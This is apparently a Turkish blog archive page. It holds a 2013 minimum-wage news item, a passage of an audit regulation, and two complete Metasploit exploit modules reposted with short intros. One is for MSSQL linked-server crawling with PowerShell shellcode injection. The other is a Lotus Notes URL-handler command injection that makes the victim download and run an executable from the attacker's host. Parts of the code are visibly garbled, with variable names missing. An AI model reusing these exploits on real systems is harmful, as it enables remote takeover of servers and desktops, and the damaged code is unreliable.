Archive for 27 Aralık 2012

2013 Yılı Asgari Ücret Artışı Ne Kadar?

Çalışma ve Sosyal Güvenlik Bakanı Faruk Çelik, asgari ücret yeterli mi tartışmasının yapıldığını belirterek “Bu işçilere daha az ücret verilmesini yasaklayan önemli bir sosyal politika aracı” diye konuştu. Türk-İş’in muhalefetiyle kabul edilen yeni asgari ücret yılın ikinci yarısında ise net 804.7 TL olarak uygulanacak. Yılın ilk 6 ayı için yapılan 34.21 TL’lik asgari ücret artışıyla, 1.3 kilogram kıyma, 3.5 kilogram peynir, 26 kutu makarna, 4.7 kilogram ayçiçek yağı alınabiliyor.
SON NOKTAYI BAŞBAKAN ERDOĞAN KOYDU

Read more

BAĞIMSIZ DENETİM YÖNETMELİĞİ

 

26 Aralık 2012  ÇARŞAMBA

Resmî Gazete

Sayı : 28509

YÖNETMELİK

Kamu Gözetimi, Muhasebe ve Denetim Standartları Kurumundan:

BAĞIMSIZ DENETİM YÖNETMELİĞİ

BİRİNCİ BÖLÜM

Amaç, Kapsam, Dayanak ve Tanımlar

Amaç

MADDE 1 – (1) Bu Yönetmeliğin amacı; 13/1/2011 tarihli ve 6102 sayılı Türk Ticaret Kanunu ve 26/9/2011 tarihli ve 660 sayılı Kamu Gözetimi, Muhasebe ve Denetim Standartları Kurumunun Teşkilat ve Görevleri Hakkında Kanun Hükmünde Kararname çerçevesinde yapılacak bağımsız denetime, bağımsız denetim kuruluşlarına ve bağımsız denetçilere ilişkin usul ve esasları düzenlemektir.

Kapsam

MADDE 2 – (1) Bu Yönetmelik; 6102 sayılı Kanun ve 660 sayılı Kanun Hükmünde Kararname çerçevesinde yapılacak bağımsız denetime, bağımsız denetim kuruluşlarının ve bağımsız denetçilerin; yetkilendirilmelerine, sicil kayıtlarının tutulmasına, yükümlülüklerine, sorumluluklarına, bunların Kurum tarafından incelenmesine ve denetlenmesine ve bunlar hakkında uygulanacak idari yaptırımlara ilişkin usul ve esasları kapsar.

Dayanak

MADDE 3 – (1) Bu Yönetmelik, 26/9/2011 tarihli ve 660 sayılı Kamu Gözetimi, Muhasebe ve Denetim Standartları Kurumunun Teşkilat ve Görevleri Hakkında Kanun Hükmünde Kararnamenin 9 uncu, 25 inci ve 27 nci maddelerine dayanılarak hazırlanmıştır.

Tanımlar

MADDE 4 – (1) Bu Yönetmelikte geçen;

a) Bağımsız denetçi: Bağımsız denetim yapmak üzere, 1/6/1989 tarihli ve 3568 sayılı Serbest Muhasebeci Mali Müşavirlik ve Yeminli Mali Müşavirlik Kanununa göre yeminli mali müşavirlik ya da serbest muhasebeci mali müşavirlik ruhsatını almış meslek mensupları arasından Kurum tarafından yetkilendirilen kişileri,

b) Bağımsız denetim: Finansal tablo ve diğer finansal bilgilerin, finansal raporlama standartlarına uygunluğu ve doğruluğu hususunda, makul güvence sağlayacak yeterli ve uygun bağımsız denetim kanıtlarının elde edilmesi amacıyla, denetim standartlarında öngörülen gerekli bağımsız denetim tekniklerinin uygulanarak defter, kayıt ve belgeler üzerinden denetlenmesi ve değerlendirilerek rapora bağlanmasını,

c) Bağımsız denetim ekibi: Bağımsız denetim kuruluşu adına belirli bir bağımsız denetim görevini yerine getirmek üzere, sorumlu denetçi ve onun sorumluluğu altında görev yapan bağımsız denetçilerden oluşan ekibi,

ç) Bağımsız denetim kuruluşu: Kurumca bağımsız denetim yapmakla yetkilendirilen ortakları yeminli mali müşavirlik ya da serbest muhasebeci mali müşavirlik ruhsatını almış meslek mensuplarından oluşan sermaye şirketlerini,

d) Bağımsız denetim resmi sicili (Sicil): Kurum tarafından elektronik ortamda tutulan ve bağımsız denetim kuruluşları ile denetçilerin kayıtlarının izlendiği resmi sicili,

e) Denetim ağı: Bağımsız denetim kuruluşlarının veya bağımsız denetçilerin aralarında hukuki bir bağ olup olmadığına bakılmaksızın; kâr veya maliyet paylaşımını hedefleyen veya ortak bir mülkiyet, kontrol veya yönetimi, ortak kalite kontrol politikalarını ve süreçlerini, ortak bir iş stratejisini, ortak bir marka veya unvan kullanımını ya da mesleki kaynakların önemli bir kısmını ortaklaşa kullanmayı amaçlayan işbirliğine yönelik yapılanmayı,

f) Denetlenen işletme: Bağımsız denetim yaptırmak üzere bağımsız denetim kuruluşu veya bağımsız denetçi ile sözleşme imzalamış olan işletmeleri, Read more

Microsoft SQL Server Database Link Crawling Command Execution

Metasploit tarafından Microsoft SQL Server Database Link Crawling önemli komut çalıştırma açığı bulunmuş olup,
Açığı ilişkin remote exploit aşağıdadır. Açıkla MSSQL üzerinde uzaktan komutlar çalıştırılmakta, bir takım hash ve verilere ulaşılmaktadır. Bu önemli açığı bir an önce kapatmak yerinde olacaktır.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##


require 'msf/core'
require 'msf/core/exploit/mssql_commands'

class Metasploit3 < Msf::Exploit::Remote
        Rank = GreatRanking

        include Msf::Exploit::Remote::MSSQL
        include Msf::Auxiliary::Report
        include Msf::Exploit::CmdStagerVBS

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Microsoft SQL Server Database Link Crawling Command Execution',
                        'Description'    => %q{
                                        This module can be used to crawl MS SQL Server database links and deploy
                                Metasploit payloads through links configured with sysadmin privileges using a
                                valid SQL Server Login.

                                        If you are attempting to obtain multiple reverse shells using this module we
                                recommend setting the "DisablePayloadHandler" advanced option to "true", and setting
                                up a multi/handler to run in the background as a job to support multiple incoming
                                shells.

                                        If you are interested in deploying payloads to spefic servers this module also
                                supports that functionality via the "DEPLOYLIST" option.

                                        Currently, the module is capable of delivering payloads to both 32bit and 64bit
                                Windows systems via powershell memory injection methods based on Matthew Graeber's
                                work. As a result, the target server must have powershell installed. By default,
                                all of the crawl information is saved to a CSV formatted log file and MSF loot so
                                that the tool can also be used for auditing without deploying payloads.
                        },
                        'Author'         =>
                                [
                                        'Antti Rantasaari <antti.rantasaari[at]netspi.com>',
                                        'Scott Sutherland "nullbind" <scott.sutherland[at]netspi.com>'
                                ],
                        'Platform'      => [ 'win' ],
                        'License'        => MSF_LICENSE,
                        'References'     =>
                                [
                                        ['URL', 'http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012'],
                                        ['URL','http://msdn.microsoft.com/en-us/library/ms188279.aspx'],
                                        ['URL','http://www.exploit-monday.com/2011_10_16_archive.html']
                                ],
                        'Platform'       => 'win',
                        'DisclosureDate' => 'Jan 1 2000',
                        'Targets'        =>
                                [
                                        [ 'Automatic', { } ],
                                ],
                        'DefaultTarget'  => 0
                ))

                register_options(
                        [
                                OptBool.new('DEPLOY',       [false, 'Deploy payload via the sysadmin links', 'false']),
                                OptString.new('DEPLOYLIST', [false,'Comma seperated list of systems to deploy to']),
                                OptString.new('PASSWORD',   [true, 'The password for the specified username'])
                        ], self.class)

                register_advanced_options(
                        [
                                OptString.new('POWERSHELL_PATH', [true, 'Path to powershell.exe', "C:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe"])
                        ], self.class)
        end

        def exploit
                # Display start time
                time1 = Time.new
                print_status("-------------------------------------------------")
                print_status("Start time : #{time1.inspect}")
                print_status("-------------------------------------------------")

                # Check if credentials are correct
                print_status("Attempting to connect to SQL Server at #{rhost}:#{rport}...")

                if (not mssql_login_datastore)
                        print_error("Invalid SQL Server credentials")
                        print_status("-------------------------------------------------")
                        return
                end

                # Define master array to keep track of enumerated database information
                masterList = Array.new
                masterList[0] = Hash.new                        # Define new hash
                masterList[0]["name"] = ""                  # Name of the current database server
                masterList[0]["db_link"] = ""               # Name of the linked database server
                masterList[0]["db_user"] = ""               # User configured on the database server link
                masterList[0]["db_sysadmin"] = ""   # Specifies if  the database user configured for the link has sysadmin privileges
                masterList[0]["db_version"] = ""    # Database version of the linked database server
                masterList[0]["db_os"] = ""                 # OS of the linked database server
                masterList[0]["path"] = [[]]          # Link path used during crawl - all possible link paths stored
                masterList[0]["done"] = 0                     # Used to determine if linked need to be crawled

                shelled = Array.new                                     # keeping track of shelled systems - multiple incoming sa links could result in multiple shells on one system

                # Setup query for gathering information from database servers
                versionQuery = "select @,system_user,is_srvrolemember('sysadmin'),(REPLACE(REPLACE(REPLACE\
                (ltrim((select REPLACE((Left(@,CHARINDEX('-',@)-1)),'Microsoft','')+ rtrim(CONVERT\
                (char(30), SERVERPROPERTY('Edition'))) +' '+ RTRIM(CONVERT(char(20), SERVERPROPERTY('ProductLevel')))+\
                CHAR(10))), CHAR(10), ''), CHAR(13), ''), CHAR(9), '')) as version, RIGHT(@, LEN(@)- 3 \
                -charindex (' ON ',@)) as osver,is_srvrolemember('sysadmin'),(select count(srvname) from \
                master..sysservers where dataaccess=1 and srvname!=@ and srvproduct = 'SQL Server')as linkcount"

                # Create loot table to store configuration information from crawled database server links
                linked_server_table = Rex::Ui::Text::Table.new(
                        'Header'  => 'Linked Server Table',
                        'Ident'   => 1,
                        'Columns' => ['db_server', 'db_version', 'db_os', 'link_server', 'link_user', 'link_privilege', 'link_version', 'link_os','link_state']
                )
                save_loot = ""

                # Start crawling through linked database servers
                while masterList.any? {|f| f["done"] == 0}
                        # Find the first DB server that has not been crawled (not marked as done)
                        server = masterList.detect {|f| f["done"] == 0}

                        # Get configuration information from the database server
                        sql = query_builder(server["path"].first,"",0,versionQuery)
                        result = mssql_query(sql, false) if mssql_login_datastore
                        parse_results = result[:rows]
                        parse_results.each { |s|
                                server["name"] = s[0]
                                server["db_user"] = s[1]
                                server["db_sysadmin"] = s[5]
                                server["db_version"] =  s[3]
                                server["db_os"] = s[4]
                                server["numlinks"] = s[6]
                        }
                        if masterList.length == 1
                                print_good("Successfully connected to #{server["name"]}")
                                if datastore['VERBOSE'] == true
                                        show_configs(server["name"],parse_results,true)
                                elsif server["db_sysadmin"] == 1
                                        print_good("Sysadmin on #{server["name"]}")
                                end
                        end
                        if server["db_sysadmin"] == 1
                                enable_xp_cmdshell(server["path"].first,server["name"],shelled)
                        end

                        # If links were found, determine if they can be connected to and add to crawl list
                        if (server["numlinks"] > 0)
                                # Enable loot
                                save_loot = "yes"

                                # Select a list of the linked database servers that exist on the current database server
                                print_status("")
                                print_status("-------------------------------------------------")
                                print_status("Crawling links on #{server["name"]}...")
                                # Display number db server links
                                print_status("Links found: #{server["numlinks"]}")
                                print_status("-------------------------------------------------")
                                execute = "select srvname from master..sysservers where dataaccess=1 and srvname!=@ and srvproduct = 'SQL Server'"
                                sql = query_builder(server["path"].first,"",0,execute)
                                result = mssql_query(sql, false) if mssql_login_datastore

                                result[:rows].each {|name|
                                        name.each {|name|

                                                # Check if link works and if sysadmin permissions - temp array to save orig server[path]
                                                temppath = Array.new
                                                temppath = server["path"].first.dup
                                                temppath << name

                                                # Get configuration information from the linked server
                                                sql = query_builder(temppath,"",0,versionQuery)
                                                result = mssql_query(sql, false) if mssql_login_datastore

                                                # Add newly aquired db servers to the masterlist, but don't add them if the link is broken or already exists
                                                if result[:errors].empty? and result[:rows] != nil then
                                                        # Assign db query results to variables for hash
                                                        parse_results = result[:rows]

                                                        # Add link server information to loot
                                                        link_status = 'up'
                                                        write_to_report(name,server,parse_results,linked_server_table,link_status)

                                                        # Display link server information in verbose mode
                                                        if datastore['VERBOSE'] == true
                                                                show_configs(name,parse_results)
                                                                print_status("  o Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")}")
                                                        else
                                                                if parse_results[0][5] == 1
                                                                        print_good("Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} (Sysadmin!)")
                                                                else
                                                                        print_status("Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")}")
                                                                end
                                                        end

                                                        # Add link to masterlist hash
                                                        unless masterList.any? {|f| f["name"] == name}
                                                                masterList << add_host(name,server["path"].first,parse_results)
                                                        else
                                                                (0..masterList.length-1).each do |x|
                                                                        if masterList[x]["name"] == name
                                                                                masterList[x]["path"] << server["path"].first.dup
                                                                                masterList[x]["path"].last << name
                                                                                unless shelled.include?(name)
                                                                                        if parse_results[0][2]==1
                                                                                                enable_xp_cmdshell(masterList[x]["path"].last.dup,name,shelled)
                                                                                        end
                                                                                end
                                                                        else
                                                                                break
                                                                        end
                                                                end
                                                        end
                                                else
                                                        # Add to report
                                                        linked_server_table << [server["name"],server["db_version"],server["db_os"],name,'NA','NA','NA','NA','Connection Failed']

                                                        # Display status to user
                                                        if datastore['VERBOSE'] == true
                                                                print_status(" ")
                                                                print_error("Linked Server: #{name} ")
                                                                print_error("  o Link Path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} - Connection Failed")
                                                                print_status("    Failure could be due to:")
                                                                print_status("    - A dead server")
                                                                print_status("    - Bad credentials")
                                                                print_status("    - Nested open queries through SQL 2000")
                                                        else
                                                                print_error("Link Path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} - Connection Failed")
                                                        end
                                                end
                                        }
                                }
                        end
                        # Set server to "crawled"
                        server["done"]=1
                end

                print_status("-------------------------------------------------")

                # Setup table for loot
                this_service = nil
                if framework.db and framework.db.active
                        this_service = report_service(
                                :host  => rhost,
                                :port => rport,
                                :name => 'mssql',
                                :proto => 'tcp'
                        )
                end

                # Display end time
                time1 = Time.new
                print_status("End time : #{time1.inspect}")
                print_status("-------------------------------------------------")

                # Write log to loot / file
                if (save_loot=="yes")
                        filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_linked_servers.csv"
                        path = store_loot("crawled_links", "text/plain", datastore['RHOST'], linked_server_table.to_csv, filename, "Linked servers",this_service)
                        print_status("Results have been saved to: #{path}")
                end
        end

        # ---------------------------------------------------------------------
        # Method that builds nested openquery statements using during crawling
        # ---------------------------------------------------------------------
        def query_builder(path,sql,ticks,execute)

                # Temp used to maintain the original masterList[x]["path"]
                temp = Array.new
                path.each {|i| temp << i}

                # Actual query - defined when the function originally called - ticks multiplied
                if path.length == 0
                        return execute.gsub("'","'"*2**ticks)

                # openquery generator
                else
                        sql = "select * from openquery(\"" + temp.shift + "\"," + "'"*2**ticks + query_builder(temp,sql,ticks+1,execute) + "'"*2**ticks + ")"
                        return sql
                end
        end

        # ---------------------------------------------------------------------
        # Method that builds nested openquery statements using during crawling
        # ---------------------------------------------------------------------
        def query_builder_rpc(path,sql,ticks,execute)

                # Temp used to maintain the original masterList[x]["path"]
                temp = Array.new
                path.each {|i| temp << i}

                # Actual query - defined when the function originally called - ticks multiplied
                if path.length == 0
                        return execute.gsub("'","'"*2**ticks)

                # Openquery generator
                else
                        exec_at = temp.shift
                        sql = "exec(" + "'"*2**ticks + query_builder_rpc(temp,sql,ticks+1,execute) + "'"*2**ticks +") at [" + exec_at + "]"
                        return sql
                end
        end

        # ---------------------------------------------------------------------
        # Method for adding new linked database servers to the crawl list
        # ---------------------------------------------------------------------
        def add_host(name,path,parse_results)

                # Used to add new servers to masterList
                server = Hash.new
                server["name"] = name
                temppath = Array.new
                path.each {|i| temppath << i }
                server["path"] = [temppath]
                server["path"].first << name
                server["done"] = 0
                parse_results.each {|stuff|
                        server["db_user"] = stuff.at(1)
                        server["db_sysadmin"] = stuff.at(2)
                        server["db_version"] =  stuff.at(3)
                        server["db_os"] = stuff.at(4)
                        server["numlinks"] = stuff.at(6)
                }
                return server
        end

        # ---------------------------------------------------------------------
        # Method to display configuration information
        # ---------------------------------------------------------------------
        def show_configs(i,parse_results,entry=false)

                print_status(" ")
                parse_results.each {|stuff|

                        # Translate syadmin code
                        status = stuff.at(5)
                        if status == 1 then
                                dbpriv = "sysadmin"
                        else
                                dbpriv = "user"
                        end

                        # Display database link information
                        if entry == false
                                print_status("Linked Server: #{i}")
                                print_status("  o Link user: #{stuff.at(1)}")
                                print_status("  o Link privs: #{dbpriv}")
                                print_status("  o Link version: #{stuff.at(3)}")
                                print_status("  o Link OS: #{stuff.at(4).strip}")
                                print_status("  o Links on server: #{stuff.at(6)}")
                        else
                                print_status("Server: #{i}")
                                print_status("  o Server user: #{stuff.at(1)}")
                                print_status("  o Server privs: #{dbpriv}")
                                print_status("  o Server version: #{stuff.at(3)}")
                                print_status("  o Server OS: #{stuff.at(4).strip}")
                                print_status("  o Server on server: #{stuff.at(6)}")
                        end
                }
        end

        # ---------------------------------------------------------------------
        # Method for generating the report and loot
        # ---------------------------------------------------------------------
        def write_to_report(i,server,parse_results,linked_server_table,link_status)
                parse_results.each {|stuff|
                        # Parse server information
                        db_link_user = stuff.at(1)
                        db_link_sysadmin = stuff.at(2)
                        db_link_version =  stuff.at(3)
                        db_link_os = stuff.at(4)

                        # Add link server to the reporting array and set link_status to 'up'
                        linked_server_table << [server["name"],server["db_version"],server["db_os"],i,db_link_user,db_link_sysadmin,db_link_version,db_link_os,link_status]

                        return linked_server_table
                }
        end

        # ---------------------------------------------------------------------
        # Method for enabling xp_cmdshell
        # ---------------------------------------------------------------------
        def enable_xp_cmdshell(path,name,shelled)
                # Enables "show advanced options" and xp_cmdshell if needed and possible
                # They cannot be enabled in user transactions (i.e. via openquery)
                # Only enabled if RPC_Out is enabled for linked server
                # All changes are reverted after payload delivery and execution

                # Check if "show advanced options" is enabled
                execute = "select cast(value_in_use as int) FROM  sys.configurations WHERE  name = 'show advanced options'"
                sql = query_builder(path,"",0,execute)
                result = mssql_query(sql, false) if mssql_login_datastore
                saoOrig = result[:rows].pop.pop

                # Check if "xp_cmdshell" is enabled
                execute = "select cast(value_in_use as int) FROM  sys.configurations WHERE  name = 'xp_cmdshell'"
                sql = query_builder(path,"",0,execute)
                result = mssql_query(sql, false) if mssql_login_datastore
                xpcmdOrig = result[:rows].pop.pop

                # Try blindly to enable "xp_cmdshell" on the linked server
                # Note:
                # This only works if rpcout is enabled for all links in the link path.
                # If that is not the case it fails cleanly.
                if xpcmdOrig == 0
                        if saoOrig == 0
                                # Enabling show advanced options and xp_cmdshell
                                execute = "sp_configure 'show advanced options',1;reconfigure"
                                sql = query_builder_rpc(path,"",0,execute)
                                result = mssql_query(sql, false) if mssql_login_datastore
                        end

                        # Enabling xp_cmdshell
                        print_status("\t - xp_cmdshell is not enabled on " + name + "... Trying to enable")
                        execute = "sp_configure 'xp_cmdshell',1;reconfigure"
                        sql = query_builder_rpc(path,"",0,execute)
                        result = mssql_query(sql, false) if mssql_login_datastore
                end

                # Verifying that xp_cmdshell is now enabled (could be unsuccessful due to server policies, total removal etc.)
                execute = "select cast(value_in_use as int) FROM  sys.configurations WHERE  name = 'xp_cmdshell'"
                sql = query_builder(path,"",0,execute)
                result = mssql_query(sql, false) if mssql_login_datastore
                xpcmdNow = result[:rows].pop.pop

                if xpcmdNow == 1 or xpcmdOrig == 1
                        print_status("\t - Enabled xp_cmdshell on " + name) if xpcmdOrig == 0
                        if datastore['DEPLOY']
                                print_status("Ready to deploy a payload #{name}")
                                if datastore['DEPLOYLIST']==""
                                        datastore['DEPLOYLIST'] = nil
                                end
                                if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true
                                        print_status("\t - Checking if #{name} is on the deploy list...")
                                end
                                if datastore['DEPLOYLIST'] != nil
                                        deploylist = datastore['DEPLOYLIST'].upcase.split(',')
                                end
                                if datastore['DEPLOYLIST'] == nil or deploylist.include? name.upcase
                                        if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true
                                                print_status("\t - #{name} is on the deploy list.")
                                        end
                                        unless shelled.include?(name)
                                                powershell_upload_exec(path)
                                                shelled << name
                                        else
                                                print_status("Payload already deployed on #{name}")
                                        end
                                elsif datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true
                                        print_status("\t - #{name} is not on the deploy list")
                                end
                        end
                else
                        print_error("\t - Unable to enable xp_cmdshell on " + name)
                end

                # Revert soa and xp_cmdshell to original state
                if xpcmdOrig == 0 and xpcmdNow == 1
                        print_status("\t - Disabling xp_cmdshell on " + name)
                        execute = "sp_configure 'xp_cmdshell',0;reconfigure"
                        sql = query_builder_rpc(path,"",0,execute)
                        result = mssql_query(sql, false) if mssql_login_datastore
                end
                if saoOrig == 0 and xpcmdNow == 1
                        execute = "sp_configure 'show advanced options',0;reconfigure"
                        sql = query_builder_rpc(path,"",0,execute)
                        result = mssql_query(sql, false) if mssql_login_datastore
                end
        end

        # ----------------------------------------------------------------------
        # Method that delivers shellcode payload via powershell thread injection
        # ----------------------------------------------------------------------
        def powershell_upload_exec(path)

                # Create powershell script that will inject shell code from the selected payload
                myscript ="$code = @\"
[DllImport(\"kernel32.dll\")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport(\"kernel32.dll\")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport(\"msvcrt.dll\")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
\"@
$winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru
[Byte[]]$sc =#{Rex::Text.to_hex(payload.encoded).gsub('\\',',0').sub(',','')}
$size = 0x1000
if ($sc.Length -gt 0x1000) {$size = $sc.Length}
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
$winFunc::CreateThread(0,0,$x,0,0,0)"

                # Unicode encode powershell script
                mytext_uni = Rex::Text.to_unicode(myscript)

                # Base64 encode unicode
                mytext_64 = Rex::Text.encode_base64(mytext_uni)

                # Generate random file names
                rand_filename = rand_text_alpha(8)
                var_duplicates = rand_text_alpha(8)

                # Write base64 encoded powershell payload to temp file
                # This is written 2500 characters at a time due to xp_cmdshell ruby function limitations
                # Also, line number tracking was added so that duplication lines caused by nested linked
                # queries could be found and removed.
                print_status("Deploying payload...")
                linenum = 0
                mytext_64.scan(/.{1,2500}/).each {|part|
                        execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Write \"--#{linenum}--#{part}\" >> %TEMP%\\#{rand_filename}\"'"
                        sql = query_builder(path,"",0,execute)
                        result = mssql_query(sql, false) if mssql_login_datastore
                        linenum = linenum+1
                }

                # Remove duplicate lines from temp file and write to new file
                execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{rand_filename}| get-unique > %TEMP%\\#{var_duplicates}\"'"
                sql = query_builder(path,"",0,execute)
                result = mssql_query(sql, false) if mssql_login_datastore

                # Remove tracking tags from lines
                execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{var_duplicates} | Foreach-Object {$_ -replace \\\"--.*--\\\",\\\"\\\"} | Set-Content %TEMP%\\#{rand_filename}\"'"
                sql = query_builder(path,"",0,execute)
                result = mssql_query(sql, false) if mssql_login_datastore

                # Used base64 encoded powershell command so that we could use -noexit and avoid parsing errors
                # If running on 64bit system, 32bit powershell called from syswow64
                powershell_cmd =  "$temppath=(gci env:temp).value;$dacode=(gc $temppath\\#{rand_filename}) -join '';if((gci env:processor_identifier).value -like\
                '*64*'){$psbits=\"#{datastore['POWERSHELL_PATH']} -noexit -noprofile -encodedCommand $dacode\"} else {$psbits=\"powershell.exe\
                -noexit -noprofile -encodedCommand $dacode\"};iex $psbits"
                powershell_uni = Rex::Text.to_unicode(powershell_cmd)
                powershell_64 = Rex::Text.encode_base64(powershell_uni)

                # Setup query
                execute = "select 1; EXEC master..xp_cmdshell 'powershell -EncodedCommand #{powershell_64}'"
                sql = query_builder(path,"",0,execute)

                # Execute the playload
                print_status("Executing payload...")
                result = mssql_query(sql, false) if mssql_login_datastore
                # Remove payload data from the target server
                execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Remove-Item %TEMP%\\#{rand_filename}\";powershell -C \"Remove-Item %TEMP%\\#{var_duplicates}\"'"
                sql = query_builder(path,"",0,execute)
                result = mssql_query(sql,false)
        end
end

IBM Lotus Notes Client URL Handler Command Injection

IBM Lotus Notes Client URL Handler Command Injection açığıl bulunmuştur. Açık metasploit tarafından bulunmuş olup, Açığın oluşumu, kullanılışı ve açık hakkındaki exploit aşağıdadır.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
        Rank = ExcellentRanking

        include Msf::Exploit::Remote::HttpServer::HTML
        include Msf::Exploit::EXE
        include Msf::Exploit::FileDropper

        def initialize(info={})
                super(update_info(info,
                        'Name'           => "IBM Lotus Notes Client URL Handler Command Injection",
                        'Description'    => %q{
                                        This modules exploits a command injection vulnerability in the URL handler for
                                for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with
                                an specially crafted notes:// URL to execute arbitrary commands with also arbitrary
                                arguments. This module has been tested successfully on Windows XP SP3 with IE8,
                                Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.
                        },
                        'License'        => MSF_LICENSE,
                        'Author'         =>
                                [
                                        'Moritz Jodeit', # Vulnerability discovery
                                        'Sean de Regge', # Vulnerability analysis
                                        'juan vazquez' # Metasploit
                                ],
                        'References'     =>
                                [
                                        [ 'CVE', '2012-2174' ],
                                        [ 'OSVDB', '83063' ],
                                        [ 'BID', '54070' ],
                                        [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-154/' ],
                                        [ 'URL', 'http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html' ],
                                        [ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21598348' ]
                                ],
                        'Payload'        =>
                                {
                                        'Space'           => 2048,
                                        'StackAdjustment' => -3500
                                },
                        'DefaultOptions'  =>
                                {
                                        'EXITFUNC'         => "none",
                                        'InitialAutoRunScript' => 'migrate -k -f'
                                },
                        'Platform'       => 'win',
                        'Targets'        =>
                                [
                                        [ 'Automatic', {} ]
                                ],
                        'Privileged'     => false,
                        'DisclosureDate' => "Jun 18 2012",
                        'DefaultTarget'  => 0))

                register_options(
                        [
                                OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
                        ], self.class)
        end

        def exploit
                 = rand_text_alpha(2) + ".exe"
                 = rand_text_alpha(2) + ".js"
                super
        end

        def on_new_session(session)
                if session.type == "meterpreter"
                        session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
                end

                .delete_if do |file|
                        win_file = file.gsub("/", "\\\\")
                        if session.type == "meterpreter"
                                begin
                                        wintemp = session.fs.file.expand_path("%TEMP%")
                                        win_file = "#{wintemp}\\#{win_file}"
                                        # Meterpreter should do this automatically as part of
                                        # fs.file.rm().  Until that has been implemented, remove the
                                        # read-only flag with a command.
                                        session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
                                        session.fs.file.rm(win_file)
                                        print_good("Deleted #{file}")
                                        true
                                rescue ::Rex::Post::Meterpreter::RequestError
                                        print_error("Failed to delete #{win_file}")
                                        false
                                end

                        end
                end

        end

        def on_request_uri(cli, request)

                if request.uri =~ /\.exe$/
                        return if ((p=regenerate_payload(cli))==nil)
                        register_file_for_cleanup("#{}") unless  and .include?("#{}")
                        register_file_for_cleanup("#{}") unless  and .include?("#{}")
                        data = generate_payload_exe({:code=>p.encoded})
                        print_status("Sending payload")
                        send_response(cli, data, {'Content-Type'=>'application/octet-stream'})
                        return
                end

                my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
                if datastore['SSL']
                        schema = "https"
                else
                        schema = "http"
                end
                uri = "#{schema}://#{my_host}"
                uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.exe"

                script = "var w=new ActiveXObject('wscript.shell');"
                script << "w.CurrentDirectory=w.ExpandEnvironmentStrings('\\%TEMP\\%');"
                script << "var x=new ActiveXObject('Microsoft.XMLHTTP');"
                script << "x.open('GET','#{uri}', false);"
                script << "x.send();"
                script << "var s=new ActiveXObject('ADODB.Stream');"
                script << "s.Mode=3;"
                script << "s.Type=1;"
                script << "s.Open();"
                script << "s.Write(x.responseBody);"
                script << "s.SaveToFile('#{}',2);"
                script << "w.Run('#{}');"

                vmargs = "/q /s /c echo #{script} > %TEMP%\\\\#{}& start cscript %TEMP%\\\\#{}& REM"

                link_id = rand_text_alpha(5 + rand(5))

                js_click_link = %Q|
                function clickLink(link) {
                        var cancelled = false;

                        if (document.createEvent) {
                                var event = document.createEvent("MouseEvents");
                                event.initMouseEvent("click", true, true, window,
                                        0, 0, 0, 0, 0,
                                        false, false, false, false,
                                        0, null);
                                cancelled = !link.dispatchEvent(event);
                        }
                        else if (link.fireEvent) {
                                cancelled = !link.fireEvent("onclick");
                        }

                        if (!cancelled) {
                                window.location = link.href;
                        }
                }
                |

                if datastore['OBFUSCATE']
                        js_click_link = ::Rex::Exploitation::JSObfu.new(js_click_link)
                        js_click_link.obfuscate
                        js_click_link_fn = js_click_link.sym('clickLink')
                else
                        js_click_link_fn = 'clickLink'
                end


                html = <<-EOS
                <html>
                <head>
                <script>
                #{js_click_link}
                </script>
                </head>
                <body onload="#{js_click_link_fn}(document.getElementById('#{link_id}'));">
                <a id="#{link_id}" href="notes://#{rand_text_alpha_upper(3+rand(3))}/#{rand_text_alpha_lower(3+rand(3))} -RPARAMS java -vm c:\\windows\\system32\\cmd.exe -vmargs #{vmargs}"></a>
                </body>
                </html>
                EOS

                print_status("Sending html")
                send_response(cli, html, {'Content-Type'=>'text/html'})

        end

end

WordPress WP-Property PHP File Upload Vulnerability

